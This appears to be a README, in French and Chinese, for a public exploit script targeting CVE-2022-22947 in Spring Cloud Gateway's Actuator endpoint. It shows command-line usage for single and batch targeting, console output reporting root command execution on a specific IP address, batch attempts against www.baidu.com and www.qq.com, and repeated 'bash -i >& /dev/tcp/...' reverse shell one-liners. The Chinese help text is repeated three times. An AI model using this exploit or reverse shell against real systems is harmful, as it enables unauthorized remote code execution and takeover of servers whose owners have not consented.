
Un script qui peut être vérifié individuellement ou par lots, et peut également ouvrir un shell inversé
Niveau de danger : Élevé
Statut POC/EXP : Public
Numéro CNVD : CNNVD-2022-16402
Numéro CVE : CVE-2022-22947
Spring Cloud Gateway présente une vulnérabilité d'exécution de code à distance. Cette vulnérabilité se produit au niveau du point d'extension Actuator des applications Spring Cloud Gateway, qui, lorsqu'il est activé, exposé et non sécurisé, est susceptible d'être attaqué par injection de code. Un attaquant peut exploiter cette vulnérabilité en créant malicieusement des requêtes permettant l'exécution de code arbitraire à distance sur l'hôte distant.
-h Afficher l'aide
-u Spécifier l'URL cible
-c Spécifier la commande à exécuter (par défaut : id)
-f Spécifier un fichier contenant les URL cibles
1. Vérification d'une cible unique
Méthode 1 :
E:\pocs>python cve-2022-22947.py
验证单个目标:
1、python cve-2022-22947.py 进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
2、python cve-2022-22947.py -u http://example.com -c whoami
验证多个目标
1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
反弹shell
1、python cve-2022-22947.py -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
2、进入交互模式,输入目标和反弹shell的命令
请输入一个目标url地址:http://123.58.236.76:8484
请输入想要执行的命令,默认执行id:whoami
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['root\\n']
Méthode 2 :
E:\learn\python\pocs\pocs>python cve-2022-22947.py -u http://123.58.236.76:8484 -c whoami
验证单个目标:
1、python cve-2022-22947.py 进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
2、python cve-2022-22947.py -u http://example.com -c whoami
验证多个目标
1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
反弹shell
1、python cve-2022-22947.py -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
2、进入交互模式,输入目标和反弹shell的命令
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['root\\n']
2. Vérification par lots
E:\learn\python\pocs\pocs>python cve-2022-22947.py -f url.txt
验证单个目标:
1、python cve-2022-22947.py 进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
2、python cve-2022-22947.py -u http://example.com -c whoami
验证多个目标
1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
反弹shell
1、python cve-2022-22947.py -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
2、进入交互模式,输入目标和反弹shell的命令
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
[-]目标:http://www.baidu.com,漏洞验证失败,请手动验证!
[-]目标:http://www.qq.com,漏洞验证失败,请手动验证!
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
3. Reverse shell
python cve-2022-22947.py -u http://123.58.236.76:8484 -c "bash -i >& /dev/tcp/xxx.xxx.xxx/65534 0>&1"
image-20220519233354807
image-20220519233429912